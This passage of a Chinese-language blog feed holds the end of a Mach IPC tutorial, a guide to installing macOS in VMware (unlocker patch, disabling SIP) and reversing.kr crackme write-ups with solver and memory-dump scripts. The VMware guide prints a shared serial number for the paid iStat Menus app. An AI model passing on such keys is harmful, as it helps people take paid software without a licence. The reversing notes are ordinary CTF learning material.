</span><br><span class="line">        <span class="built_in">mach_error</span>(<span class="string">&quot;factorial:&quot;</span>, kr); </span><br><span class="line">    <span class="keyword">else</span> </span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;factorial of %d is %d\n&quot;</span>, INPUT_NUMBER, fac); </span><br><span class="line"> </span><br><span class="line">    <span class="built_in">mach_port_deallocate</span>(<span class="built_in">mach_task_self</span>(), server_port); </span><br><span class="line"> </span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>); </span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Client 源码较短，只做了两件事：</p><ol><li><p>向 bootstrap 查询 Server 注册的 server port</p></li><li><p>向 server port 调用 <code>string_length</code>和 <code>factorial</code> 方法，需要注意到这两个方法的第一个参数均为 <code>mach_port_t</code> 类型，且方法的实现位于 <code>miscUser.c</code></p><blockquote><p>为什么这两个方法的实现位于 miscUser.c 中而不是 server.c 中？</p><p>因为对于 Client 端来说，两个方法的实际实现不归 Client 端来管，miscUser.c 中的两个同名函数最终会执行 mach IPC 向 Server 发起请求。</p></blockquote></li></ol><h4 id="f-编译与运行">f. 编译与运行</h4><p>使用以下命令编译并运行：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 终端1</span></span><br><span class="line">mig -v misc.defs </span><br><span class="line">gcc -Wall -g -o server server.c miscServer.c </span><br><span class="line">gcc -Wall -g -o client client.c miscUser.c </span><br><span class="line">./server</span><br><span class="line"></span><br><span class="line"><span class="comment"># 终端2</span></span><br><span class="line">./client</span><br></pre></td></tr></table></figure><p>这是所有源文件的关联图：</p><p><img src="/2021/12/mach_ipc_intro/image-20220106000421902.png" alt="image-20220106000421902"></p><p>运行结果：</p><p><img src="/2021/12/mach_ipc_intro/image-20220105234905893.png" alt="image-20220105234905893"></p><p>这是 Client 和 Server 的关系：</p><p><img src="/2021/12/mach_ipc_intro/image-20220106000500793.png" alt="image-20220106000500793"></p><h2 id="九、参考">九、参考</h2><ul><li>*OS internal Vol 1, Vol2</li><li><a href="https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html">Mach ports - darling</a></li><li>dmcyk blog<ul><li><a href="https://dmcyk.xyz/post/xnu_ipc_i_mach_messages/">XNU IPC - Mach Message</a></li><li><a href="https://dmcyk.xyz/post/xnu_ipc_ii_message_apis/xnu_ipc_ii_message_apis/">XNU IPC - bidirectional Mach messages</a></li><li><a href="https://dmcyk.xyz/post/xnu_ipc_iii_ool_data/">XNU IPC - Introduction to OOL data</a></li></ul></li><li><a href="https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/KernelProgramming/Mach/Mach.html">Mach - Apple archive dev documentation</a></li><li><a href="http://web.mit.edu/darwin/src/modules/xnu/osfmk/man/">XNU man: Mach IPC Interface - mit</a></li><li><a href="https://web.mit.edu/darwin/src/modules/xnu/osfmk/man/mach_msg.html">mach_msg - mit</a></li><li><a href="https://www.gnu.org/software/hurd/gnumach-doc/Message-Format.html">4.2.2 Message Format - GNUMach-doc</a></li><li><a href="https://www.nextop.de/NeXTstep_3.3_Developer_Documentation/OperatingSystem/Part1_Mach/02_Messages/Messages.htmld/index.html">Using Mach Messages - NeXTstep 3.3 Developer Documentation</a></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;Mach，是一个&lt;strong&gt;面向通信&lt;/strong&gt;的操作系统&lt;strong&gt;微内核&lt;/strong&gt;，其基本工作单位为 &lt;code&gt;task&lt;/code&gt;（而不是 process）。Mach 内核提供了一种 IPC 机制，而 XNU 的大多数服务也建立在 Mach IPC 和 Mach Task 上。&lt;/p&gt;
&lt;p&gt;Mach 有多种抽象的基本概念，其中一部分分别是 &lt;code&gt;task&lt;/code&gt;、&lt;code&gt;thread&lt;/code&gt;、&lt;code&gt;port&lt;/code&gt;、&lt;code&gt;message&lt;/code&gt;、&lt;code&gt;memory object&lt;/code&gt;。&lt;/p&gt;
&lt;p&gt;Mach 微内核作为 MacOS XNU 内核的组成部分，接管了相当重要的一部分功能。其中最著名的莫过于 Mach IPC 进程间通信机制。&lt;/p&gt;
&lt;p&gt;本人将在这里简单记录一下 Mach IPC 部分机理。&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;需要注意的是，这是本人第一次接触 Mach IPC，因此其中可能会有一部分陈述或者说明存在问题，还请各位师傅不吝指出。&lt;/p&gt;
&lt;/blockquote&gt;</summary>
    
    
    
    
    <category term="mac" scheme="https://kiprey.github.io/tags/mac/"/>
    
    <category term="mach" scheme="https://kiprey.github.io/tags/mach/"/>
    
    <category term="ipc" scheme="https://kiprey.github.io/tags/ipc/"/>
    
  </entry>
  
  <entry>
    <title>Win10 Vmware Workstation 16 安装 macOS 记录</title>
    <link href="https://kiprey.github.io/2021/12/vmware_macos/"/>
    <id>https://kiprey.github.io/2021/12/vmware_macos/</id>
    <published>2021-12-12T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.211Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>这里记录了我在 Win10 VMware workstation 上配置 macOS 虚拟机所踩过的坑点。</p><span id="more"></span><h2 id="二、MacOS-安装">二、MacOS 安装</h2><ul><li><p>首先，下载 VMware 解锁 MacOS 选项的补丁。</p><blockquote><p>“解锁 MacOS” 的这个说法其实个人感觉不是特别直接。</p><p>这个补丁的用途是<strong>让 VMware 额外支持 MacOS</strong>。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git@github.com:BDisp/unlocker.git</span><br></pre></td></tr></table></figure><p>之后，去任务管理器中，<strong>强制退出所有 VMware 开头的进程</strong>，防止补丁失败：</p><p><img src="/2021/12/vmware_macos/image-20211213105750235.png" alt="image-20211213105750235"></p><p>之后<strong>管理员执行</strong> <code>win-install.cmd</code>。执行时脚本会去  vmware 官网上下载一些东西，时间取决于网络条件。</p><p>执行完成后，<strong>重启电脑</strong>或手动去  <strong>服务</strong> 底下打开 <strong>VMware NAT Service</strong> 和 <strong>VMware VMnet DHCP service</strong> 服务，否则<strong>虚拟机将无法连接网络</strong>。</p><blockquote><p>坑点：之前忘记重启网络服务了…</p></blockquote></li><li><p>接着，去 Vmware 上新建虚拟机，并指定光盘映像文件为下载下来的 ISO/CDR 文件：</p><p><img src="/2021/12/vmware_macos/image-20211213111248818.png" alt="image-20211213111248818"></p><p>然后选择 <code>Apple Mac OS X</code>，并一路 next 下去。磁盘大小建议 <strong>至少分配70GB</strong>。</p><blockquote><p>如果此时 VMware 里没有这个选项，则说明安装 VMware 补丁失败，需要重新安装最新版的补丁。</p></blockquote><p><img src="/2021/12/vmware_macos/image-20211213111314996.png" alt="image-20211213111314996"></p></li><li><p>虚拟机建立好后，启动虚拟机。在<strong>磁盘工具</strong>处：</p><p><img src="/2021/12/vmware_macos/image-20211213112904276.png" alt="image-20211213112904276"></p><p>将 Vmware 磁盘抹掉（格式化），不然安装 macOS 时将无法访问到 VMware 磁盘：</p><p><img src="/2021/12/vmware_macos/image-20211213113011006.png" alt="image-20211213113011006"></p><p>抹掉时改个磁盘名称就可以，其他的都不用动：</p><p><img src="/2021/12/vmware_macos/image-20211213113058440.png" alt="image-20211213113058440"></p><p>格式化磁盘后，在上方 <strong>实用工具-&gt;终端</strong>：</p><p><img src="/2021/12/vmware_macos/image-20211213113304952.png" alt="image-20211213113304952"></p><p>键入 <code>csrutil disable</code> 禁用系统完整性保护：</p><blockquote><p>因为系统完整性保护会限制 root 权限的行为。</p></blockquote><p><img src="/2021/12/vmware_macos/image-20211213113443227.png" alt="image-20211213113443227"></p><p>之后键入 <code>csrutil authenticated-root disable</code> 以关闭 Authenticated-root 保护。该保护会使得 MacOS 在引导期间，将一个被加密签名后的<strong>只读根文件系统快照挂载进根目录</strong>，因此我们需要禁用它以便于修改根路径或系统路径下的文件等。</p><blockquote><p>如果还是不行，则在 MacOS 安装完成后，执行 <code>sudo mount -uw /</code> 试试，注意该指令只在本次开机时有效，下次开机需要重新设置。</p></blockquote><p>接下来照常安装 MacOS 即可。</p></li><li><p>MacOS 安装完成后。<strong>不要马上启动！不要马上启动！不要马上启动！</strong></p><p>要先在该 MacOS 的 vmx 文件末尾追加 <code>smc.version = 0</code>，防止虚拟机出现错误。</p><p>追加完成后再启动。</p></li><li><p>启动新安装的 MacOS，之后一定要<strong>立即升级当前安装的 MacOS 系统</strong>（12GB左右）。因为 Apple 对远古版本的 MacOS 支持性非常低，就连安装软件都会有限制。</p><p>一定要在完成 MacOS 系统升级后，再去装各类软件以及 IDE 等等。</p><p>最好先安装当前远古版本 MacOS 系统的一些补丁，再去升级 MacOS 系统，不然可能有一定概率会升级失败。</p><blockquote><p>我这边更新到的版本是  <code>macOS Monterey 12.0.1</code>。</p></blockquote></li></ul><h2 id="三、安装各类软件">三、安装各类软件</h2><ol><li><p>vmtools。右键虚拟机并点击 <strong>安装 Vmware Tools</strong>，然后根据步骤一步步来就好。</p><p><img src="/2021/12/vmware_macos/image-20211213120226602.png" alt="image-20211213120226602"></p></li><li><p>AppStore 上安装</p><ol><li>DevCleaner for xcode：释放 Xcode 缓存文件。</li><li>xcode（12GB左右）。不用多说。</li><li>超级右键。扩展一下自己的右键菜单，使得支持<strong>右键打开终端操作</strong>。</li></ol></li><li><p>下载 <a href="https://bjango.com/mac/istatmenus/">iStat Menus6</a>。这是 MacOS 上的一个系统监测软件，需要付费，可用序列号如下：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Email: 982092332@qq.com</span><br><span class="line">SN: GAWAE-FCWQ3-P8NYB-C7GF7-NEDRT-Q5DTB-MFZG6-6NEQC-CRMUD-8MZ2K-66SRB-SU8EW-EDLZ9-TGH3S-8SGA</span><br><span class="line"></span><br><span class="line">ref: http://www.pc6.com/mac/111587.html</span><br></pre></td></tr></table></figure></li><li><p>安装homebrew 包管理器</p><blockquote><p>安装 homebrew 时需要<strong>多次输入密码</strong>，切记别走开。</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 安装 homebrew</span></span><br><span class="line">/bin/bash -c <span class="string">&quot;<span class="subst">$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)</span>&quot;</span></span><br><span class="line"><span class="comment"># 配置国内 brew 源</span></span><br><span class="line"><span class="built_in">cd</span> <span class="string">&quot;<span class="subst">$(brew --repo)</span>&quot;</span></span><br><span class="line">git remote set-url origin https://mirrors.aliyun.com/homebrew/brew.git</span><br><span class="line">git remote get-url origin</span><br></pre></td></tr></table></figure><blockquote><p>如果发现 brew 安装有问题，无法搜索到任何软件包，则尝试运行 <code>brew doctor</code> 命令获取解决方案。</p></blockquote></li><li><p>设置双拼<strong>自然码</strong>方案。进入 <strong>设置-&gt;键盘-&gt;输入法</strong>，选择<strong>简体双拼</strong>，并在终端键入以下命令以启动<strong>自然码</strong>方案：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">defaults write com.apple.inputmethod.CoreChineseEngineFramework shuangpinLayout 5</span><br></pre></td></tr></table></figure></li><li><p>安装 <a href="https://code.visualstudio.com/docs/?dv=osx">VSCode for macOS</a>。下载后将其拖入<strong>应用程序文件夹</strong>下。</p></li><li><p>安装 proxychain</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">brew install proxychains-ng</span><br><span class="line">nano /usr/local/etc/proxychains.conf</span><br><span class="line">proxychains4 curl -v google.com </span><br></pre></td></tr></table></figure></li><li><p>配置 git。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen</span><br><span class="line"><span class="built_in">cat</span> ~/.ssh/id_rsa.pub <span class="comment"># 获取公钥</span></span><br><span class="line"><span class="comment"># 将公钥上传至 github 上</span></span><br><span class="line">git config --global user.name Kiprey</span><br><span class="line">git config --global user.email Kiprey@qq.com</span><br></pre></td></tr></table></figure></li><li><p>安装 ohmyzsh。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">brew install wget</span><br><span class="line">sh -c <span class="string">&quot;<span class="subst">$(wget -O- https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)</span>&quot;</span></span><br></pre></td></tr></table></figure><p>之后安装常用插件</p><ul><li><p>autojump</p><p>执行以下命令下载：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git://github.com/joelthelion/autojump.git</span><br><span class="line"><span class="built_in">cd</span> autojump</span><br><span class="line">./install.py</span><br></pre></td></tr></table></figure><p>之后 <code>nano ~/.zshrc</code>，将以下内容添加至文件末尾：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[[ -s /Users/kiprey/.autojump/etc/profile.d/autojump.sh ]] &amp;&amp; <span class="built_in">source</span> /Users/kiprey/.autojump/etc/profile.d/autojump.sh</span><br><span class="line"><span class="built_in">autoload</span> -U compinit &amp;&amp; compinit -u</span><br></pre></td></tr></table></figure><p>然后将 <code>autojump</code> 添加进 <code>.zshrc</code> 中的 plugin 字段中：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Which plugins would you like to load?</span></span><br><span class="line"><span class="comment"># Standard plugins can be found in $ZSH/plugins/</span></span><br><span class="line"><span class="comment"># Custom plugins may be added to $ZSH_CUSTOM/plugins/</span></span><br><span class="line"><span class="comment"># Example format: plugins=(rails git textmate ruby lighthouse)</span></span><br><span class="line"><span class="comment"># Add wisely, as too many plugins slow down shell startup.</span></span><br><span class="line">plugins=(git autojump)</span><br></pre></td></tr></table></figure></li><li><p>zsh-autosuggestions 与 zsh-syntax-highlighting</p><p>下载：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">git <span class="built_in">clone</span> git://github.com/zsh-users/zsh-autosuggestions <span class="variable">$ZSH_CUSTOM</span>/plugins/zsh-autosuggestions</span><br><span class="line">git <span class="built_in">clone</span> git://github.com/zsh-users/zsh-syntax-highlighting <span class="variable">$ZSH_CUSTOM</span>/plugins/zsh-syntax-highlighting</span><br></pre></td></tr></table></figure><p>将 <code>zsh-autosuggestions</code> 和 <code>zsh-syntax-highlighting</code> 添加进 <code>.zshrc</code> 中的 plugin 字段中：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">plugins=(git autojump zsh-autosuggestions zsh-syntax-highlighting)</span><br></pre></td></tr></table></figure></li></ul><p>插件安装完成后，最后执行 <code>source ~/.zshrc</code> 重新载入新的 zsh 配置以启动插件。</p></li><li><p>安装 ShadowSocksR。下载地址：<a href="https://github.com/qinyuhang/ShadowsocksX-NG-R/releases">shadowsocksX-NG-R - github</a>，支持订阅地址。</p></li></ol><h2 id="四、扩容分区">四、扩容分区</h2><p>如果发现 MacOS 磁盘大小不够，需要扩容一下虚拟磁盘，则按照以下步骤进行：</p><ol><li><p>先去 Vmware 那里扩容一下磁盘</p></li><li><p>在 MacOS 中，执行 <code>diskutil list</code> 查看当前磁盘情况：</p><p><img src="/2021/12/vmware_macos/image-20211213105925673.png" alt="image-20211213105925673"></p><p>其中，disk0 为整个磁盘，而 disk0s2 分区即 MacOS 此时使用的空间，因此我们需要扩容 disk0s2。</p></li><li><p>尝试扩展磁盘。</p><p>网络上都使用的是这个命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diskutil resizeVolume disk0s2 50GB</span><br></pre></td></tr></table></figure><blockquote><p>其中 disk0s2 为待扩容磁盘，50GB 为目标扩容大小。</p></blockquote><p>但是由于本人的 disk0s2 为 <code>Apple_APFS</code> 类型，因此上述命令不可使用。</p><p>需要使用以下命令：</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">diskutil apfs resizeContainer disk0s2 70GB</span><br></pre></td></tr></table></figure><p>之后就开始扩容：</p><p><img src="/2021/12/vmware_macos/image-20211213110427580.png" alt="image-20211213110427580"></p></li><li><p>扩容成功</p><p><img src="/2021/12/vmware_macos/image-20211213111727333.png" alt="image-20211213111727333"></p></li></ol><h2 id="五、关闭系统完整性保护">五、关闭系统完整性保护</h2><p>MacOS 中的系统完整性保护(<strong>SIP</strong>)，会限制住 root 用户的权限，因此需要将其关闭。</p><blockquote><p>见过用 root 权限 lldb attach 其他进程时，被拒绝的快乐嘛…</p></blockquote><p>最简单的关闭方式，莫过于上面在一开始安装时就将其关闭。</p><p>但要是当时安装时忘记关闭，那么现在去关闭 SIP 就会稍微折腾一点…</p><ol><li><p>设置虚拟机 CD/DVD 路径为原先的 MacOS 安装镜像：</p><p><img src="/2021/12/vmware_macos/image-20211213130817589.png" alt="image-20211213130817589"></p></li></ol><p>之后，进入虚拟机 BIOS</p><p><img src="/2021/12/vmware_macos/image-20211213131013230.png" alt="image-20211213131013230"></p><p>选择以 CD 为启动盘：</p><p><img src="/2021/12/vmware_macos/image-20211213131148295.png" alt="image-20211213131148295"></p><p>之后在启动后的界面，进入 <strong>实用工具-&gt;终端</strong> 下，键入 <code>csrutil disable</code> 命令并重启虚拟机，即可关闭 SIP。</p><p><img src="/2021/12/vmware_macos/image-20211213113443227.png" alt="image-20211213113443227"></p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;这里记录了我在 Win10 VMware workstation 上配置 macOS 虚拟机所踩过的坑点。&lt;/p&gt;</summary>
    
    
    
    
    <category term="vmware" scheme="https://kiprey.github.io/tags/vmware/"/>
    
  </entry>
  
  <entry>
    <title>Reversing.kr 刷题笔记 - 1</title>
    <link href="https://kiprey.github.io/2021/12/reversing_kr-1/"/>
    <id>https://kiprey.github.io/2021/12/reversing_kr-1/</id>
    <published>2021-12-11T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.074Z</updated>
    
    <content type="html"><![CDATA[<h2 id="0-简介">0. 简介</h2><p>这里将记录一些笔者学习 <a href="http://reversing.kr">reversing.kr</a> 中的逆向题所留下的笔记。</p><p>这篇笔记所记录的题目分值为 100-120。</p><span id="more"></span><h2 id="1-Easy-Crack">1. Easy Crack</h2><p>IDA 32 位打开，通过交叉引用：</p><p><img src="/2021/12/reversing_kr-1/image-20211209225604780.png" alt="image-20211209225604780"></p><p>至</p><p><img src="/2021/12/reversing_kr-1/image-20211209225615397.png" alt="image-20211209225615397"></p><p>很容易找到目标函数，并定位关键判断语句：</p><p><img src="/2021/12/reversing_kr-1/image-20211209225657036.png" alt="image-20211209225657036"></p><p>因此可以很容易得出 flag 为： <code>Ea5yR3versing</code></p><p><img src="/2021/12/reversing_kr-1/image-20211209230836059.png" alt="image-20211209230836059"></p><h2 id="2-Easy-Keygen">2. Easy Keygen</h2><p>下下来一个压缩包，ReadMe.txt 中写道：</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Find the Name when the Serial is 5B134977135E7D13</span><br></pre></td></tr></table></figure><p>同时打开程序，窗口提示输入 name：</p><p><img src="/2021/12/reversing_kr-1/image-20211209231245555.png" alt="image-20211209231245555"></p><p>看来这题应该是要我们根据 Serial 来反推输入的 Name。</p><p>IDA 打开，发现一个简易的映射算法：</p><p><img src="/2021/12/reversing_kr-1/image-20211209231510613.png" alt="image-20211209231510613"></p><p>于是我们可以根据该算法来编写一个简易的解密算法：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> _CRT_SECURE_NO_WARNINGS</span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;iostream&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    string serial = <span class="string">&quot;5B134977135E7D13&quot;</span>;</span><br><span class="line">    <span class="type">char</span> key[<span class="number">3</span>] = &#123; <span class="number">16</span>, <span class="number">32</span>, <span class="number">48</span> &#125;;</span><br><span class="line">    <span class="type">int</span> hex_val;</span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> i = <span class="number">0</span>; i &lt; serial.<span class="built_in">size</span>(); i += <span class="number">2</span>) &#123;</span><br><span class="line">        <span class="built_in">sscanf</span>(serial.<span class="built_in">substr</span>(i, <span class="number">2</span>).<span class="built_in">c_str</span>(), <span class="string">&quot;%x&quot;</span>, &amp;hex_val);</span><br><span class="line">        cout &lt;&lt; (<span class="type">char</span>)(hex_val ^ key[(i/<span class="number">2</span>) % <span class="number">3</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>解出 flag：<code>K3yg3nm3</code></p><p><img src="/2021/12/reversing_kr-1/image-20211209233454523.png" alt="image-20211209233454523"></p><h2 id="3-Easy-ELF">3. Easy_ELF</h2><p>确实很 Easy。程序首先会读取一个字符串，之后对字符串进行以下判断：</p><p><img src="/2021/12/reversing_kr-1/image-20211209234452851.png" alt="image-20211209234452851"></p><p>将该判断逆向一下，就可得到 flag：<code>L1NUX</code></p><h2 id="4-Easy-Unpack">4. Easy Unpack</h2><p>看上去这是一个需要脱壳的程序，但根据 IDA 反编译结果来看，应该是一个压缩壳。直接从 main 函数的反汇编列表往下拉到最底下，最后的那个 jmp 指令跳转的位置就是 OEP。</p><p>跳转前：</p><p><img src="/2021/12/reversing_kr-1/image-20211210001019055.png" alt="image-20211210001019055"></p><p>跳转后（该部分代码是 _start 函数的反汇编代码）：</p><p><img src="/2021/12/reversing_kr-1/image-20211210001149346.png" alt="image-20211210001149346"></p><p>因此 OEP 为 <code>00401150</code>，而这也正是要提交的 flag。</p><h2 id="5-ImagePrc">5. ImagePrc</h2><p>首先查看 WinMain 逻辑：</p><p><img src="/2021/12/reversing_kr-1/image-20211212115326564.png" alt="image-20211212115326564"></p><p>我们可以很容易的找到事件处理例程，并通过字符串交叉对比，找到真正的校验位置：</p><p><img src="/2021/12/reversing_kr-1/image-20211212121036289.png" alt="image-20211212121036289"></p><p>位图大小为 <code>200 x 150</code>，若有 90000 个像素相同则正确。而 <code>*v13</code> 和 <code>v13[v14]</code> 应该指向的是<strong>两块不同的位图</strong>，要是能dump下来看看，估计就能看出结果。</p><blockquote><p>位图大小总像素点个数：200x150x3 = 90000，RGB 格式。</p></blockquote><p>别的也看不出什么了，在调试时先随手画个 A 留个标记，之后尝试用 ida dump 内存出来看看。</p><p>dump 脚本：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> idaapi</span><br><span class="line">start_address = <span class="number">0x2FA0048</span></span><br><span class="line">data_length = <span class="number">200</span>*<span class="number">150</span>*<span class="number">3</span></span><br><span class="line">data = idaapi.dbg_read_memory(start_address , data_length)</span><br><span class="line">fp = <span class="built_in">open</span>(<span class="string">&#x27;./dump.bin&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>)</span><br><span class="line">fp.write(data)</span><br><span class="line">fp.close()</span><br></pre></td></tr></table></figure><p>用 Python 处理一下 dump 出来的内存：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! python3</span></span><br><span class="line"><span class="comment"># `pip3 install pillow` to enable PIL</span></span><br><span class="line"><span class="keyword">from</span> PIL <span class="keyword">import</span> Image, ImageDraw</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line">im = Image.new(<span class="string">&quot;RGB&quot;</span>, (<span class="number">200</span>, <span class="number">150</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./dump.bin&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">150</span>):</span><br><span class="line">        <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">200</span>):</span><br><span class="line">            r = <span class="built_in">int</span>.from_bytes(f.read(<span class="number">1</span>), <span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            g = <span class="built_in">int</span>.from_bytes(f.read(<span class="number">1</span>), <span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            b = <span class="built_in">int</span>.from_bytes(f.read(<span class="number">1</span>), <span class="string">&#x27;little&#x27;</span>)</span><br><span class="line">            im.putpixel((i, j), (r,g,b))</span><br><span class="line"></span><br><span class="line"><span class="comment"># im.save(&quot;dump.png&quot;)</span></span><br><span class="line">im.show()</span><br></pre></td></tr></table></figure><p>v13 对应的图像如下：</p><p><img src="/2021/12/reversing_kr-1/image-20211212145026054.png" alt="image-20211212145026054"></p><p>可以看到刚好 dump 出来的图片是<strong>上下倒置</strong>的。</p><p>接着我们就如法炮制，将 <code>v13[v14]</code> 的图片也 dump 出来：</p><p><img src="/2021/12/reversing_kr-1/image-20211212145155253.png" alt="image-20211212145155253"></p><p>即 flag 为 <code>GOT</code>。</p><h2 id="6-Ransomware">6. Ransomware</h2><p>压缩包解压，根据 readme 的描述，可以看到要求我们解密 file 文件。</p><p>把目标文件拖到 Exeinfo 里一看，加了个 UPX压缩壳：</p><p><img src="/2021/12/reversing_kr-1/image-20211212155306762.png" alt="image-20211212155306762">s</p><p>因此直接用脱壳机脱壳：</p><p><img src="/2021/12/reversing_kr-1/image-20211212155515369.png" alt="image-20211212155515369"></p><p>之后用 IDA 打开看看：</p><p><img src="/2021/12/reversing_kr-1/image-20211212155709684.png" alt="image-20211212155709684"></p><p>可以发现在 main 函数中存在超大量无用指令，使得 IDA 无法进行反汇编，提高分析难度，因此我们需要尝试去掉这些指令：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">data = <span class="literal">None</span></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;./run.exe&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    data = f.read()</span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">UPX0:0044A73D 60                                      pusha</span></span><br><span class="line"><span class="string">UPX0:0044A73E 61                                      popa</span></span><br><span class="line"><span class="string">UPX0:0044A73F 90                                      nop</span></span><br><span class="line"><span class="string">UPX0:0044A740 50                                      push    eax</span></span><br><span class="line"><span class="string">UPX0:0044A741 58                                      pop     eax</span></span><br><span class="line"><span class="string">UPX0:0044A742 53                                      push    ebx</span></span><br><span class="line"><span class="string">UPX0:0044A743 5B                                      pop     ebx</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line">new_data = data.replace(<span class="string">b&quot;\x60\x61\x90\x50\x58\x53\x5b&quot;</span>, <span class="string">b&quot;\x90&quot;</span> * <span class="number">7</span>)</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span 